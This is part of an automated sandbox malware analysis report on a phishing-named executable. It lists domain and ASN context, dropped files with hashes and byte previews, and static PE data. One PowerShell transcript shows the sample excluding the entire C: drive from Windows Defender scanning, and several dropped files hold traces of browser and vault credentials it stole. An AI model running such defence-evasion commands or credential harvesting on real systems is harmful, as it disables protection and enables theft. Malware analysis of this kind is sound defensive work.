                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/385451/sample/Require your Sales Ledger from 01-April-2020.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      14:40:37API Interceptor17x Sleep call for process: powershell.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      No context

                                                                      Domains

                                                                      No context

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      TEAMINTERNET-ASDE52FFDD3BC0DE63EB8F6CD8A90373EAF3BCC37BB0804FC.exeGet hashmaliciousBrowse
                                                                      • 185.53.177.71
                                                                      PO#560.zip.exeGet hashmaliciousBrowse
                                                                      • 185.53.177.14
                                                                      safecrypt.exeGet hashmaliciousBrowse
                                                                      • 185.53.178.54
                                                                      RFQ HAN4323.exeGet hashmaliciousBrowse
                                                                      • 185.53.177.11
                                                                      Doc.exeGet hashmaliciousBrowse
                                                                      • 185.53.178.14
                                                                      payment slip_pdf.exeGet hashmaliciousBrowse
                                                                      • 185.53.177.10
                                                                      iQnbU4o7yx.exeGet hashmaliciousBrowse
                                                                      • 185.53.179.28
                                                                      requisition from ASTRO EXPRESS.xlsxGet hashmaliciousBrowse
                                                                      • 185.53.177.10
                                                                      inquiry 19117030P.xlsxGet hashmaliciousBrowse
                                                                      • 185.53.177.14
                                                                      HwL7D1UcZG.exeGet hashmaliciousBrowse
                                                                      • 185.53.177.13
                                                                      CREDIT NOTE DEBIT NOTE 30.1.2021.xlsxGet hashmaliciousBrowse
                                                                      • 185.53.177.13
                                                                      CiL08gVVjl.exeGet hashmaliciousBrowse
                                                                      • 185.53.177.13
                                                                      Mv Maersk Kleven V949E.xlsxGet hashmaliciousBrowse
                                                                      • 185.53.177.13
                                                                      Inquiry PR11020204168.xlsxGet hashmaliciousBrowse
                                                                      • 185.53.177.13
                                                                      PO210119.exe.exeGet hashmaliciousBrowse
                                                                      • 185.53.178.53
                                                                      payment advice002436_pdf.exeGet hashmaliciousBrowse
                                                                      • 185.53.177.10
                                                                      PDRgIfT71e.exeGet hashmaliciousBrowse
                                                                      • 185.53.177.13
                                                                      Payment Advice.xlsxGet hashmaliciousBrowse
                                                                      • 185.53.177.13
                                                                      payment advice00000789_pdf.exeGet hashmaliciousBrowse
                                                                      • 185.53.177.10
                                                                      Q52msELKeI.exeGet hashmaliciousBrowse
                                                                      • 185.53.178.13

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      C:\Users\user\AppData\Local\Temp\AdvancedRun.exeAccount Confirmation.exeGet hashmaliciousBrowse
                                                                        Download Report.08.04.2021.pdf.exeGet hashmaliciousBrowse
                                                                          ORDER-02188.exeGet hashmaliciousBrowse
                                                                            08042021New-PurchaseOrder.exeGet hashmaliciousBrowse
                                                                              RFQ-034.exeGet hashmaliciousBrowse
                                                                                Payment Slip.exeGet hashmaliciousBrowse
                                                                                  Revised Invoice No CU 7035.exeGet hashmaliciousBrowse
                                                                                    Sales_Order description.exeGet hashmaliciousBrowse
                                                                                      Outstanding invoices.exeGet hashmaliciousBrowse
                                                                                        Q88_Bulk Carrier.exeGet hashmaliciousBrowse
                                                                                          Payment _Slip copy.exeGet hashmaliciousBrowse
                                                                                            MV. HUA KAI V-2023.exeGet hashmaliciousBrowse
                                                                                              Order_April shipment.exeGet hashmaliciousBrowse
                                                                                                INVOICE for Order PIEX310113978.exeGet hashmaliciousBrowse
                                                                                                  Krishna Gangaa Enviro System Pvt Ltd.exeGet hashmaliciousBrowse
                                                                                                    TT SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                                      PO75773937475895377.exeGet hashmaliciousBrowse
                                                                                                        SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exeGet hashmaliciousBrowse
                                                                                                          Download Report.06.05.2021.exeGet hashmaliciousBrowse
                                                                                                            Outstanding invoices.exeGet hashmaliciousBrowse

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Require your Sales Ledger from 01-April-2020.exe.log
                                                                                                              Process:C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):1119
                                                                                                              Entropy (8bit):5.356708753875314
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                                                                              MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                                                                              SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                                                                              SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                                                                              SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                                                                              Malicious:true
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):14734
                                                                                                              Entropy (8bit):4.993014478972177
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                                              MD5:8D5E194411E038C060288366D6766D3D
                                                                                                              SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                                              SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                                              SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                                              Malicious:false
                                                                                                              Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):22192
                                                                                                              Entropy (8bit):5.605242149765194
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:ctCDC03SDl1u2b+JwSBKnIRultIo3D7Y9gxSJUeRe1BMrmbZaAV7E5WDm64I+iaS:HSDXu2kw4KOultp33xXeNq34pC
                                                                                                              MD5:DCA964DEC7B92F4DE1CDCFF994619018
                                                                                                              SHA1:47ED9EC01C5E990CF03D373489CADC37C4602014
                                                                                                              SHA-256:B0B560F92DD0FA69E5591F7ABADA4FE9BAC9193DCD11C136C75C14A1271D3199
                                                                                                              SHA-512:849187A8AE0C1B005C3351166449565CA89D203DD1B9E75EA82723ED7C3B1834E2AE5BEAEE1245328EFF2BE7C1EA02157D0F1EF31AF324538E855D92D5C559C0
                                                                                                              Malicious:false
                                                                                                              Preview: @...e...........e.......................;............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                              C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                                                                              Process:C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):91000
                                                                                                              Entropy (8bit):6.241345766746317
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: Account Confirmation.exe, Detection: malicious, Browse
                                                                                                              • Filename: Download Report.08.04.2021.pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: ORDER-02188.exe, Detection: malicious, Browse
                                                                                                              • Filename: 08042021New-PurchaseOrder.exe, Detection: malicious, Browse
                                                                                                              • Filename: RFQ-034.exe, Detection: malicious, Browse
                                                                                                              • Filename: Payment Slip.exe, Detection: malicious, Browse
                                                                                                              • Filename: Revised Invoice No CU 7035.exe, Detection: malicious, Browse
                                                                                                              • Filename: Sales_Order description.exe, Detection: malicious, Browse
                                                                                                              • Filename: Outstanding invoices.exe, Detection: malicious, Browse
                                                                                                              • Filename: Q88_Bulk Carrier.exe, Detection: malicious, Browse
                                                                                                              • Filename: Payment _Slip copy.exe, Detection: malicious, Browse
                                                                                                              • Filename: MV. HUA KAI V-2023.exe, Detection: malicious, Browse
                                                                                                              • Filename: Order_April shipment.exe, Detection: malicious, Browse
                                                                                                              • Filename: INVOICE for Order PIEX310113978.exe, Detection: malicious, Browse
                                                                                                              • Filename: Krishna Gangaa Enviro System Pvt Ltd.exe, Detection: malicious, Browse
                                                                                                              • Filename: TT SWIFT COPY.exe, Detection: malicious, Browse
                                                                                                              • Filename: PO75773937475895377.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe, Detection: malicious, Browse
                                                                                                              • Filename: Download Report.06.05.2021.exe, Detection: malicious, Browse
                                                                                                              • Filename: Outstanding invoices.exe, Detection: malicious, Browse
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\DB1
                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                              Category:dropped
                                                                                                              Size (bytes):40960
                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                              Malicious:true
                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              Process:C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):736256
                                                                                                              Entropy (8bit):7.158845349064943
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:JLwe/ZRRUxLGX9eW++HhtUnNJ2WD9cgMuwS2T8Xo2i10OlYKit:q0HRYLov+Yh+NzxFWgXh5K
                                                                                                              MD5:C7C27E1859F1593AEDB1EEBF0A15175E
                                                                                                              SHA1:DEB5544C037A7757462AFAB46AE2CA14A8F7F945
                                                                                                              SHA-256:D7E71646C9427067E810E1B278BEB6AD1F07E6B0C5003D9BE2611178E4F5470C
                                                                                                              SHA-512:7F8E332B6163EC2B052EAD9C9958C88DEAD193BEB5C6D93851190C9DFC27A6A78FD7FF461FB363DA6809F1134460F255DCA918BA3A23019A64870BEEDBCE2033
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!t`............................B.... ........@.. ....................................@.....................................W................................................................................... ............... ..H............text...H.... ...................... ..`.rsrc..............................@..@.reloc...............:..............@..B................$.......H.......X....2......{....G..hW...........................................(....(&...*.*..z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X ...Q.{....Xa}......}.....{....oo...:q....(....+..(........}.........(......*................n..}.....{....,..{....o}
                                                                                                              C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe:Zone.Identifier
                                                                                                              Process:C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                              Malicious:true
                                                                                                              Preview: [ZoneTransfer]....ZoneId=0
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uarlegt.1xt.ps1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ai155hga.ohd.psm1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Roaming\28L0N9-0\28Llogim.jpeg
                                                                                                              Process:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):95677
                                                                                                              Entropy (8bit):7.919177855177055
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:CGA3mwPhxXv4zyIgZKsHdnPdT6KmS3TffgjQ0NzCZcjzgbvdHvPv30U+rMbs0kzM:hUmqXvHrDHdPdTT3sZEZUWv5PvorMbss
                                                                                                              MD5:C0122538B0EEFF8698CF7E0F890D24D2
                                                                                                              SHA1:2823E6C629CB43FD4AC2D1AD2DE750FC3457AB0F
                                                                                                              SHA-256:23955408BAB3083853CBF6C47A1FD8BBAD97CBD5A8A8C40556160A7A389AFF69
                                                                                                              SHA-512:05D72B0D02CB551251854067399F23532D901374383BEA7D6A1FC25909FE0CDA7B3C4EA50331162647835A5A3C7F3CEFC27E77489494B057E3EB7CEF3C9AC507
                                                                                                              Malicious:false
                                                                                                              Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.A.:.....X.l..1lN23....._....m.....'.........S.. ..W....'.c....1....5.5.}j.Ly..k;.\...q.U..Q...bgJpW.(QKI]&b.QE.&(....Q..R...`2.`....j.$.....+..];$....F...K.1...3.)k...@<1..@.../...G. .....g.G.....~.W.W.......
                                                                                                              C:\Users\user\AppData\Roaming\28L0N9-0\28Llogrg.ini
                                                                                                              Process:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):38
                                                                                                              Entropy (8bit):2.7883088224543333
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:rFGQJhIl:RGQPY
                                                                                                              MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                                                                                              SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                                                                                              SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                                                                                              SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                                                                                              Malicious:false
                                                                                                              Preview: ....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
                                                                                                              C:\Users\user\AppData\Roaming\28L0N9-0\28Llogri.ini
                                                                                                              Process:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):40
                                                                                                              Entropy (8bit):2.8420918598895937
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                                                                                              MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                                                                                              SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                                                                                              SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                                                                                              SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                                                                                              Malicious:true
                                                                                                              Preview: ....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                                                                                                              C:\Users\user\AppData\Roaming\28L0N9-0\28Llogrv.ini
                                                                                                              Process:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):210
                                                                                                              Entropy (8bit):3.518213280978656
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:tGQPYlIaExGNlGcQga3Of9y96GO4elMrsEoY:MlIaExGNYvOI6x4FrYY
                                                                                                              MD5:8E072F1CA3E4F3D5FC69A2B9663D2544
                                                                                                              SHA1:BBA45FE6AC81F235ED17E164CFE32E2C92931AF2
                                                                                                              SHA-256:8CE7C9F67BA5EC254BBFCF5F45E8EE2822BAF2B36313C69B51E887AD93B6044A
                                                                                                              SHA-512:BCF6F6A9942A1A6F01A5A7ED099EDDE188754BAD6A575962B1A250FF43480EE08CC14A94F76B1A8E594B40A60C0E23758F0F8B9B69A19842D158009ABE7170D5
                                                                                                              Malicious:true
                                                                                                              Preview: ...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.l.r.x.b.p.m.p.x.h.f.b.m.a.q.....A.u.t.:.......P.a.s.s.:.......
                                                                                                              C:\Users\user\Documents\20210412\PowerShell_transcript.928100.qQXLRrJV.20210412144010.txt
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5048
                                                                                                              Entropy (8bit):5.380112009222799
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:BZHhGN5iqDo1ZyZ7hGN5iqDo1ZAM6UjZxhGN5iqDo1ZdFEEcZc:wWVE
                                                                                                              MD5:C71DC0FC03110798155EB83AEC4309DF
                                                                                                              SHA1:41EF12380C0EA508955E548565BB6B8B82D1A18E
                                                                                                              SHA-256:CB36DDA171E05116B9C89061B88E7217A4D06F83DC3BABA7281009ED4A694478
                                                                                                              SHA-512:C2D58E3AD65405D9B524D4C591826C850E14687C3376912CEA2CAA82E3D55646E6E945E2055CAB8B5F28202E005BD28C03E6C733B99E5FBB1F2BD0023E033CA1
                                                                                                              Malicious:false
                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210412144028..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 2420..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210412144028..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20210412144312..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):7.158845349064943
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                              File name:Require your Sales Ledger from 01-April-2020.exe
                                                                                                              File size:736256
                                                                                                              MD5:c7c27e1859f1593aedb1eebf0a15175e
                                                                                                              SHA1:deb5544c037a7757462afab46ae2ca14a8f7f945
                                                                                                              SHA256:d7e71646c9427067e810e1b278beb6ad1f07e6b0c5003d9be2611178e4f5470c
                                                                                                              SHA512:7f8e332b6163ec2b052ead9c9958c88dead193beb5c6d93851190c9dfc27a6a78fd7ff461fb363da6809f1134460f255dca918ba3a23019a64870beedbce2033
                                                                                                              SSDEEP:12288:JLwe/ZRRUxLGX9eW++HhtUnNJ2WD9cgMuwS2T8Xo2i10OlYKit:q0HRYLov+Yh+NzxFWgXh5K
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!t`............................B.... ........@.. ....................................@................................

                                                                                                              File Icon

                                                                                                              Icon Hash:0a9aa29aa2a28200

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x47d242
                                                                                                              Entrypoint Section:.text
